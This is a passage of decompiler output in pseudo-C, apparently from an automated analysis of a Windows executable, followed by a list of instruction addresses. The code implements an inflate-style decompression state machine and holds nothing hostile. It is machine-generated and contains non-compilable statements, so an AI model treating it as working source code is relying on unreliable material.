                                                                            												 *(__ebp - 0x30) = __edi;
                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                            												goto L23;
                                                                            											}
                                                                            											L157:
                                                                            											__ecx = __esi[0x26e8];
                                                                            											__eflags = __edi - __ecx;
                                                                            											if(__edi != __ecx) {
                                                                            												L163:
                                                                            												__esi[0x26ea] = __edi;
                                                                            												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            												__edi = __esi[0x26ea];
                                                                            												__ecx = __esi[0x26e9];
                                                                            												__eflags = __edi - __ecx;
                                                                            												 *(__ebp - 0x30) = __edi;
                                                                            												if(__edi >= __ecx) {
                                                                            													__eax = __esi[0x26e8];
                                                                            													__eax = __esi[0x26e8] - __edi;
                                                                            													__eflags = __eax;
                                                                            												} else {
                                                                            													__ecx = __ecx - __edi;
                                                                            													__eax = __ecx - __edi - 1;
                                                                            												}
                                                                            												__edx = __esi[0x26e8];
                                                                            												__eflags = __edi - __edx;
                                                                            												 *(__ebp - 8) = __edx;
                                                                            												if(__edi == __edx) {
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __ecx - __edx;
                                                                            													if(__ecx != __edx) {
                                                                            														__edi = __edx;
                                                                            														__eflags = __edi - __ecx;
                                                                            														 *(__ebp - 0x30) = __edi;
                                                                            														if(__edi >= __ecx) {
                                                                            															__eax =  *(__ebp - 8);
                                                                            															__eax =  *(__ebp - 8) - __edi;
                                                                            															__eflags = __eax;
                                                                            														} else {
                                                                            															__ecx = __ecx - __edi;
                                                                            															__eax = __ecx;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												__eflags = __eax;
                                                                            												if(__eax == 0) {
                                                                            													goto L183;
                                                                            												} else {
                                                                            													goto L172;
                                                                            												}
                                                                            											}
                                                                            											L158:
                                                                            											__eax = __esi[0x26e9];
                                                                            											__edx =  &(__esi[0x6e8]);
                                                                            											__eflags = __eax - __edx;
                                                                            											if(__eax == __edx) {
                                                                            												goto L163;
                                                                            											}
                                                                            											L159:
                                                                            											__edi = __edx;
                                                                            											__eflags = __edi - __eax;
                                                                            											if(__edi >= __eax) {
                                                                            												__ecx = __ecx - __edi;
                                                                            												__eflags = __ecx;
                                                                            												__eax = __ecx;
                                                                            											} else {
                                                                            												__eax = __eax - __edi;
                                                                            												__eax = __eax - 1;
                                                                            											}
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												goto L172;
                                                                            											} else {
                                                                            												goto L163;
                                                                            											}
                                                                            										case 7:
                                                                            											L173:
                                                                            											__eflags = __ebx - 7;
                                                                            											if(__ebx > 7) {
                                                                            												__ebx = __ebx - 8;
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                            												_t380 = __ebp - 0x38;
                                                                            												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                            												__eflags =  *_t380;
                                                                            											}
                                                                            											goto L175;
                                                                            										case 8:
                                                                            											L4:
                                                                            											while(_t425 < 3) {
                                                                            												if( *(_t448 - 0x34) == 0) {
                                                                            													goto L182;
                                                                            												} else {
                                                                            													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                            													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                            													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                            													_t425 = _t425 + 8;
                                                                            													continue;
                                                                            												}
                                                                            											}
                                                                            											_t425 = _t425 - 3;
                                                                            											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                            											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                            											asm("sbb ecx, ecx");
                                                                            											_t408 = _t406 >> 1;
                                                                            											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                            											if(_t408 == 0) {
                                                                            												L24:
                                                                            												 *_t446 = 9;
                                                                            												_t436 = _t425 & 0x00000007;
                                                                            												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                            												_t425 = _t425 - _t436;
                                                                            												goto L180;
                                                                            											}
                                                                            											L6:
                                                                            											_t411 = _t408 - 1;
                                                                            											if(_t411 == 0) {
                                                                            												L13:
                                                                            												__eflags =  *0x432e90;
                                                                            												if( *0x432e90 != 0) {
                                                                            													L22:
                                                                            													_t412 =  *0x40a5e8; // 0x9
                                                                            													_t446[4] = _t412;
                                                                            													_t413 =  *0x40a5ec; // 0x5
                                                                            													_t446[4] = _t413;
                                                                            													_t414 =  *0x431d0c; // 0x0
                                                                            													_t446[5] = _t414;
                                                                            													_t415 =  *0x431d08; // 0x0
                                                                            													_t446[6] = _t415;
                                                                            													L23:
                                                                            													 *_t446 =  *_t446 & 0x00000000;
                                                                            													goto L180;
                                                                            												} else {
                                                                            													_t26 = _t448 - 8;
                                                                            													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                            													__eflags =  *_t26;
                                                                            													_t416 = 0x431d10;
                                                                            													goto L15;
                                                                            													L20:
                                                                            													 *_t416 = _t438;
                                                                            													_t416 = _t416 + 4;
                                                                            													__eflags = _t416 - 0x432190;
                                                                            													if(_t416 < 0x432190) {
                                                                            														L15:
                                                                            														__eflags = _t416 - 0x431f4c;
                                                                            														_t438 = 8;
                                                                            														if(_t416 > 0x431f4c) {
                                                                            															__eflags = _t416 - 0x432110;
                                                                            															if(_t416 >= 0x432110) {
                                                                            																__eflags = _t416 - 0x432170;
                                                                            																if(_t416 < 0x432170) {
                                                                            																	_t438 = 7;
                                                                            																}
                                                                            															} else {
                                                                            																_t438 = 9;
                                                                            															}
                                                                            														}
                                                                            														goto L20;
                                                                            													} else {
                                                                            														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                                            														_push(0x1e);
                                                                            														_pop(_t440);
                                                                            														_push(5);
                                                                            														_pop(_t419);
                                                                            														memset(0x431d10, _t419, _t440 << 2);
                                                                            														_t450 = _t450 + 0xc;
                                                                            														_t442 = 0x431d10 + _t440;
                                                                            														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                                            														 *0x432e90 =  *0x432e90 + 1;
                                                                            														__eflags =  *0x432e90;
                                                                            														goto L22;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											L7:
                                                                            											_t423 = _t411 - 1;
                                                                            											if(_t423 == 0) {
                                                                            												 *_t446 = 0xb;
                                                                            												goto L180;
                                                                            											}
                                                                            											L8:
                                                                            											if(_t423 != 1) {
                                                                            												goto L180;
                                                                            											}
                                                                            											goto L9;
                                                                            										case 9:
                                                                            											while(1) {
                                                                            												L27:
                                                                            												__eflags = __ebx - 0x20;
                                                                            												if(__ebx >= 0x20) {
                                                                            													break;
                                                                            												}
                                                                            												L25:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L182;
                                                                            												}
                                                                            												L26:
                                                                            												__eax =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__ecx = __ebx;
                                                                            												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L28:
                                                                            											__eax =  *(__ebp - 0x40);
                                                                            											__ebx = 0;
                                                                            											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                            											 *(__ebp - 0x40) = 0;
                                                                            											__eflags = __eax;
                                                                            											__esi[1] = __eax;
                                                                            											if(__eax == 0) {
                                                                            												goto L53;
                                                                            											}
                                                                            											L29:
                                                                            											_push(0xa);
                                                                            											_pop(__eax);
                                                                            											goto L54;
                                                                            										case 0xa:
                                                                            											L30:
                                                                            											__eflags =  *(__ebp - 0x34);
                                                                            											if( *(__ebp - 0x34) == 0) {
                                                                            												goto L182;
                                                                            											}
                                                                            											L31:
                                                                            											__eax =  *(__ebp - 0x2c);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												L48:
                                                                            												__eflags = __eax -  *(__ebp - 0x34);
                                                                            												if(__eax >=  *(__ebp - 0x34)) {
                                                                            													__eax =  *(__ebp - 0x34);
                                                                            												}
                                                                            												__ecx = __esi[1];
                                                                            												__eflags = __ecx - __eax;
                                                                            												__edi = __ecx;
                                                                            												if(__ecx >= __eax) {
                                                                            													__edi = __eax;
                                                                            												}
                                                                            												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                            												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                            												_t80 =  &(__esi[1]);
                                                                            												 *_t80 = __esi[1] - __edi;
                                                                            												__eflags =  *_t80;
                                                                            												if( *_t80 == 0) {
                                                                            													L53:
                                                                            													__eax = __esi[0x145];
                                                                            													L54:
                                                                            													 *__esi = __eax;
                                                                            												}
                                                                            												goto L180;
                                                                            											}
                                                                            											L32:
                                                                            											__ecx = __esi[0x26e8];
                                                                            											__edx =  *(__ebp - 0x30);
                                                                            											__eflags = __edx - __ecx;
                                                                            											if(__edx != __ecx) {
                                                                            												L38:
                                                                            												__esi[0x26ea] = __edx;
                                                                            												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            												__edx = __esi[0x26ea];
                                                                            												__ecx = __esi[0x26e9];
                                                                            												__eflags = __edx - __ecx;
                                                                            												 *(__ebp - 0x30) = __edx;
                                                                            												if(__edx >= __ecx) {
                                                                            													__eax = __esi[0x26e8];
                                                                            													__eax = __esi[0x26e8] - __edx;
                                                                            													__eflags = __eax;
                                                                            												} else {
                                                                            													__ecx = __ecx - __edx;
                                                                            													__eax = __ecx - __edx - 1;
                                                                            												}
                                                                            												__edi = __esi[0x26e8];
                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                            												__eflags = __edx - __edi;
                                                                            												if(__edx == __edi) {
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __edx - __ecx;
                                                                            													if(__eflags != 0) {
                                                                            														 *(__ebp - 0x30) = __edx;
                                                                            														if(__eflags >= 0) {
                                                                            															__edi = __edi - __edx;
                                                                            															__eflags = __edi;
                                                                            															__eax = __edi;
                                                                            														} else {
                                                                            															__ecx = __ecx - __edx;
                                                                            															__eax = __ecx;
                                                                            														}
                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                            													}
                                                                            												}
                                                                            												__eflags = __eax;
                                                                            												if(__eax == 0) {
                                                                            													goto L183;
                                                                            												} else {
                                                                            													goto L48;
                                                                            												}
                                                                            											}
                                                                            											L33:
                                                                            											__eax = __esi[0x26e9];
                                                                            											__edi =  &(__esi[0x6e8]);
                                                                            											__eflags = __eax - __edi;
                                                                            											if(__eax == __edi) {
                                                                            												goto L38;
                                                                            											}
                                                                            											L34:
                                                                            											__edx = __edi;
                                                                            											__eflags = __edx - __eax;
                                                                            											 *(__ebp - 0x30) = __edx;
                                                                            											if(__edx >= __eax) {
                                                                            												__ecx = __ecx - __edx;
                                                                            												__eflags = __ecx;
                                                                            												__eax = __ecx;
                                                                            											} else {
                                                                            												__eax = __eax - __edx;
                                                                            												__eax = __eax - 1;
                                                                            											}
                                                                            											__eflags = __eax;
                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                            											if(__eax != 0) {
                                                                            												goto L48;
                                                                            											} else {
                                                                            												goto L38;
                                                                            											}
                                                                            										case 0xb:
                                                                            											goto L56;
                                                                            										case 0xc:
                                                                            											L60:
                                                                            											__esi[1] = __esi[1] >> 0xa;
                                                                            											__eax = (__esi[1] >> 0xa) + 4;
                                                                            											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                            												goto L68;
                                                                            											}
                                                                            											goto L61;
                                                                            										case 0xd:
                                                                            											while(1) {
                                                                            												L93:
                                                                            												__eax = __esi[1];
                                                                            												__ecx = __esi[2];
                                                                            												__edx = __eax;
                                                                            												__eax = __eax & 0x0000001f;
                                                                            												__edx = __edx >> 5;
                                                                            												__eax = __edx + __eax + 0x102;
                                                                            												__eflags = __esi[2] - __eax;
                                                                            												if(__esi[2] >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L73:
                                                                            												__eax = __esi[0x143];
                                                                            												while(1) {
                                                                            													L76:
                                                                            													__eflags = __ebx - __eax;
                                                                            													if(__ebx >= __eax) {
                                                                            														break;
                                                                            													}
                                                                            													L74:
                                                                            													__eflags =  *(__ebp - 0x34);
                                                                            													if( *(__ebp - 0x34) == 0) {
                                                                            														goto L182;
                                                                            													}
                                                                            													L75:
                                                                            													__ecx =  *(__ebp - 0x38);
                                                                            													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            													__ecx = __ebx;
                                                                            													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            													__ebx = __ebx + 8;
                                                                            													__eflags = __ebx;
                                                                            												}
                                                                            												L77:
                                                                            												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                            												__eax = __eax &  *(__ebp - 0x40);
                                                                            												__ecx = __esi[0x144];
                                                                            												__eax = __esi[0x144] + __eax * 4;
                                                                            												__edx =  *(__eax + 1) & 0x000000ff;
                                                                            												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                            												__eflags = __eax - 0x10;
                                                                            												 *(__ebp - 0x14) = __eax;
                                                                            												if(__eax >= 0x10) {
                                                                            													L79:
                                                                            													__eflags = __eax - 0x12;
                                                                            													if(__eax != 0x12) {
                                                                            														__eax = __eax + 0xfffffff2;
                                                                            														 *(__ebp - 8) = 3;
                                                                            													} else {
                                                                            														_push(7);
                                                                            														 *(__ebp - 8) = 0xb;
                                                                            														_pop(__eax);
                                                                            													}
                                                                            													while(1) {
                                                                            														L84:
                                                                            														__ecx = __eax + __edx;
                                                                            														__eflags = __ebx - __eax + __edx;
                                                                            														if(__ebx >= __eax + __edx) {
                                                                            															break;
                                                                            														}
                                                                            														L82:
                                                                            														__eflags =  *(__ebp - 0x34);
                                                                            														if( *(__ebp - 0x34) == 0) {
                                                                            															goto L182;
                                                                            														}
                                                                            														L83:
                                                                            														__ecx =  *(__ebp - 0x38);
                                                                            														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            														__ecx = __ebx;
                                                                            														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            														__ebx = __ebx + 8;
                                                                            														__eflags = __ebx;
                                                                            													}
                                                                            													L85:
                                                                            													__ecx = __edx;
                                                                            													__ebx = __ebx - __edx;
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            													__edx =  *(__ebp - 8);
                                                                            													__ebx = __ebx - __eax;
                                                                            													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            													__ecx = __eax;
                                                                            													__eax = __esi[1];
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            													__ecx = __esi[2];
                                                                            													__eax = __eax >> 5;
                                                                            													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                            													__eax = __eax & 0x0000001f;
                                                                            													__eax = __edi + __eax + 0x102;
                                                                            													__edi = __edx + __ecx;
                                                                            													__eflags = __edx + __ecx - __eax;
                                                                            													if(__edx + __ecx > __eax) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L86:
                                                                            													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                            													if( *(__ebp - 0x14) != 0x10) {
                                                                            														L89:
                                                                            														__edi = 0;
                                                                            														__eflags = 0;
                                                                            														L90:
                                                                            														__eax = __esi + 0xc + __ecx * 4;
                                                                            														do {
                                                                            															L91:
                                                                            															 *__eax = __edi;
                                                                            															__ecx = __ecx + 1;
                                                                            															__eax = __eax + 4;
                                                                            															__edx = __edx - 1;
                                                                            															__eflags = __edx;
                                                                            														} while (__edx != 0);
                                                                            														__esi[2] = __ecx;
                                                                            														continue;
                                                                            													}
                                                                            													L87:
                                                                            													__eflags = __ecx - 1;
                                                                            													if(__ecx < 1) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L88:
                                                                            													__edi =  *(__esi + 8 + __ecx * 4);
                                                                            													goto L90;
                                                                            												}
                                                                            												L78:
                                                                            												__ecx = __edx;
                                                                            												__ebx = __ebx - __edx;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            												__ecx = __esi[2];
                                                                            												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                            												__esi[2] = __esi[2] + 1;
                                                                            											}
                                                                            											L94:
                                                                            											__eax = __esi[1];
                                                                            											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                            											__edi = __eax;
                                                                            											__eax = __eax >> 5;
                                                                            											__edi = __edi & 0x0000001f;
                                                                            											__ecx = 0x101;
                                                                            											__eax = __eax & 0x0000001f;
                                                                            											__edi = __edi + 0x101;
                                                                            											__eax = __eax + 1;
                                                                            											__edx = __ebp - 0xc;
                                                                            											 *(__ebp - 0x14) = __eax;
                                                                            											 &(__esi[0x148]) = __ebp - 4;
                                                                            											 *(__ebp - 4) = 9;
                                                                            											__ebp - 0x18 =  &(__esi[3]);
                                                                            											 *(__ebp - 0x10) = 6;
                                                                            											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                            											__eflags =  *(__ebp - 4);
                                                                            											if( *(__ebp - 4) == 0) {
                                                                            												__eax = __eax | 0xffffffff;
                                                                            												__eflags = __eax;
                                                                            											}
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												goto L9;
                                                                            											} else {
                                                                            												L97:
                                                                            												__ebp - 0xc =  &(__esi[0x148]);
                                                                            												__ebp - 0x10 = __ebp - 0x1c;
                                                                            												__eax = __esi + 0xc + __edi * 4;
                                                                            												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                            												__eflags = __eax;
                                                                            												if(__eax != 0) {
                                                                            													goto L9;
                                                                            												}
                                                                            												L98:
                                                                            												__eax =  *(__ebp - 0x10);
                                                                            												__eflags =  *(__ebp - 0x10);
                                                                            												if( *(__ebp - 0x10) != 0) {
                                                                            													L100:
                                                                            													__cl =  *(__ebp - 4);
                                                                            													 *__esi =  *__esi & 0x00000000;
                                                                            													__eflags =  *__esi;
                                                                            													__esi[4] = __al;
                                                                            													__eax =  *(__ebp - 0x18);
                                                                            													__esi[5] =  *(__ebp - 0x18);
                                                                            													__eax =  *(__ebp - 0x1c);
                                                                            													__esi[4] = __cl;
                                                                            													__esi[6] =  *(__ebp - 0x1c);
                                                                            													goto L101;
                                                                            												}
                                                                            												L99:
                                                                            												__eflags = __edi - 0x101;
                                                                            												if(__edi > 0x101) {
                                                                            													goto L9;
                                                                            												}
                                                                            												goto L100;
                                                                            											}
                                                                            										case 0xe:
                                                                            											goto L9;
                                                                            										case 0xf:
                                                                            											L175:
                                                                            											__eax =  *(__ebp - 0x30);
                                                                            											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                            											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            											__ecx = __esi[0x26ea];
                                                                            											__edx = __esi[0x26e9];
                                                                            											__eflags = __ecx - __edx;
                                                                            											 *(__ebp - 0x30) = __ecx;
                                                                            											if(__ecx >= __edx) {
                                                                            												__eax = __esi[0x26e8];
                                                                            												__eax = __esi[0x26e8] - __ecx;
                                                                            												__eflags = __eax;
                                                                            											} else {
                                                                            												__edx = __edx - __ecx;
                                                                            												__eax = __edx - __ecx - 1;
                                                                            											}
                                                                            											__eflags = __ecx - __edx;
                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                            											if(__ecx != __edx) {
                                                                            												L183:
                                                                            												__edi = 0;
                                                                            												goto L10;
                                                                            											} else {
                                                                            												L179:
                                                                            												__eax = __esi[0x145];
                                                                            												__eflags = __eax - 8;
                                                                            												 *__esi = __eax;
                                                                            												if(__eax != 8) {
                                                                            													L184:
                                                                            													0 = 1;
                                                                            													goto L10;
                                                                            												}
                                                                            												goto L180;
                                                                            											}
                                                                            									}
                                                                            								}
                                                                            								L181:
                                                                            								goto L9;
                                                                            							}
                                                                            							L70:
                                                                            							if( *__edi == __eax) {
                                                                            								goto L72;
                                                                            							}
                                                                            							L71:
                                                                            							__esi[2] = __esi[2] & __eax;
                                                                            							 *__esi = 0xd;
                                                                            							goto L93;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L182:
                                                                            				_t443 = 0;
                                                                            				_t446[0x147] =  *(_t448 - 0x40);
                                                                            				_t446[0x146] = _t425;
                                                                            				( *(_t448 + 8))[1] = 0;
                                                                            				goto L11;
                                                                            			}









                                                                            0x00407270
                                                                            0x00407275
                                                                            0x00407277
                                                                            0x0040727d
                                                                            0x0040727f
                                                                            0x00407294
                                                                            0x00407296
                                                                            0x00407296
                                                                            0x00407281
                                                                            0x00407287
                                                                            0x00407289
                                                                            0x0040728b
                                                                            0x0040728b
                                                                            0x00407298
                                                                            0x0040729c
                                                                            0x0040729f
                                                                            0x004072a5
                                                                            0x004072a5
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072aa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072b0
                                                                            0x004072b0
                                                                            0x004072b6
                                                                            0x004072b8
                                                                            0x004072dd
                                                                            0x004072e0
                                                                            0x004072e6
                                                                            0x004072eb
                                                                            0x004072f1
                                                                            0x004072f7
                                                                            0x004072f9
                                                                            0x004072fc
                                                                            0x00407305
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x004072fe
                                                                            0x00407300
                                                                            0x00407302
                                                                            0x00407302
                                                                            0x0040730d
                                                                            0x00407313
                                                                            0x00407315
                                                                            0x00407318
                                                                            0x0040731a
                                                                            0x00407320
                                                                            0x00407322
                                                                            0x00407324
                                                                            0x00407326
                                                                            0x00407328
                                                                            0x0040732b
                                                                            0x00407334
                                                                            0x00407337
                                                                            0x00407337
                                                                            0x0040732d
                                                                            0x0040732d
                                                                            0x00407330
                                                                            0x00407330
                                                                            0x0040732b
                                                                            0x00407322
                                                                            0x00407339
                                                                            0x0040733b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040733b
                                                                            0x004072ba
                                                                            0x004072ba
                                                                            0x004072c0
                                                                            0x004072c6
                                                                            0x004072c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072ca
                                                                            0x004072ca
                                                                            0x004072cc
                                                                            0x004072ce
                                                                            0x004072d7
                                                                            0x004072d7
                                                                            0x004072d0
                                                                            0x004072d0
                                                                            0x004072d3
                                                                            0x004072d3
                                                                            0x004072d9
                                                                            0x004072db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407341
                                                                            0x00407341
                                                                            0x00407346
                                                                            0x00407348
                                                                            0x00407349
                                                                            0x0040734a
                                                                            0x0040734b
                                                                            0x00407351
                                                                            0x00407354
                                                                            0x00407357
                                                                            0x0040735a
                                                                            0x0040735c
                                                                            0x00407362
                                                                            0x00407362
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x0040736e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407373
                                                                            0x00407373
                                                                            0x00407376
                                                                            0x00407379
                                                                            0x0040737b
                                                                            0x00407412
                                                                            0x00407412
                                                                            0x00407415
                                                                            0x00407417
                                                                            0x00407418
                                                                            0x00407419
                                                                            0x0040741c
                                                                            0x00000000
                                                                            0x0040741c
                                                                            0x00407381
                                                                            0x00407381
                                                                            0x00407387
                                                                            0x00407389
                                                                            0x004073ae
                                                                            0x004073b1
                                                                            0x004073b7
                                                                            0x004073bc
                                                                            0x004073c2
                                                                            0x004073c8
                                                                            0x004073ca
                                                                            0x004073cd
                                                                            0x004073d6
                                                                            0x004073dc
                                                                            0x004073dc
                                                                            0x004073cf
                                                                            0x004073d1
                                                                            0x004073d3
                                                                            0x004073d3
                                                                            0x004073de
                                                                            0x004073e4
                                                                            0x004073e6
                                                                            0x004073e9
                                                                            0x004073eb
                                                                            0x004073f1
                                                                            0x004073f3
                                                                            0x004073f5
                                                                            0x004073f7
                                                                            0x004073f9
                                                                            0x004073fc
                                                                            0x00407405
                                                                            0x00407408
                                                                            0x00407408
                                                                            0x004073fe
                                                                            0x004073fe
                                                                            0x00407401
                                                                            0x00407401
                                                                            0x004073fc
                                                                            0x004073f3
                                                                            0x0040740a
                                                                            0x0040740c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040740c
                                                                            0x0040738b
                                                                            0x0040738b
                                                                            0x00407391
                                                                            0x00407397
                                                                            0x00407399
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040739b
                                                                            0x0040739b
                                                                            0x0040739d
                                                                            0x0040739f
                                                                            0x004073a6
                                                                            0x004073a6
                                                                            0x004073a8
                                                                            0x004073a1
                                                                            0x004073a1
                                                                            0x004073a3
                                                                            0x004073a3
                                                                            0x004073aa
                                                                            0x004073ac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407424
                                                                            0x00407424
                                                                            0x00407427
                                                                            0x00407429
                                                                            0x0040742c
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406add
                                                                            0x00406ac1
                                                                            0x00000000
                                                                            0x00406ac7
                                                                            0x00406aca
                                                                            0x00406ad4
                                                                            0x00406ad7
                                                                            0x00406ada
                                                                            0x00000000
                                                                            0x00406ada
                                                                            0x00406ac1
                                                                            0x00406ae5
                                                                            0x00406ae8
                                                                            0x00406aec
                                                                            0x00406af6
                                                                            0x00406b00
                                                                            0x00406b03
                                                                            0x00406b09
                                                                            0x00406c3d
                                                                            0x00406c3f
                                                                            0x00406c45
                                                                            0x00406c48
                                                                            0x00406c4b
                                                                            0x00000000
                                                                            0x00406c4b
                                                                            0x00406b0f
                                                                            0x00406b0f
                                                                            0x00406b10
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6f
                                                                            0x00406c15
                                                                            0x00406c15
                                                                            0x00406c1a
                                                                            0x00406c1d
                                                                            0x00406c22
                                                                            0x00406c25
                                                                            0x00406c2a
                                                                            0x00406c2d
                                                                            0x00406c32
                                                                            0x00406c35
                                                                            0x00406c35
                                                                            0x00000000
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b79
                                                                            0x00406b79
                                                                            0x00406b9b
                                                                            0x00406b9e
                                                                            0x00406ba0
                                                                            0x00406ba3
                                                                            0x00406ba8
                                                                            0x00406b7e
                                                                            0x00406b7e
                                                                            0x00406b83
                                                                            0x00406b85
                                                                            0x00406b87
                                                                            0x00406b8c
                                                                            0x00406b92
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8c
                                                                            0x00000000
                                                                            0x00406baa
                                                                            0x00406bd7
                                                                            0x00406bdc
                                                                            0x00406bde
                                                                            0x00406bdf
                                                                            0x00406be1
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406c0a
                                                                            0x00406c0f
                                                                            0x00406c0f
                                                                            0x00000000
                                                                            0x00406c0f
                                                                            0x00406ba8
                                                                            0x00406b6f
                                                                            0x00406b12
                                                                            0x00406b12
                                                                            0x00406b13
                                                                            0x00406b5d
                                                                            0x00000000
                                                                            0x00406b5d
                                                                            0x00406b15
                                                                            0x00406b16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c52
                                                                            0x00406c52
                                                                            0x00406c56
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c5c
                                                                            0x00406c5c
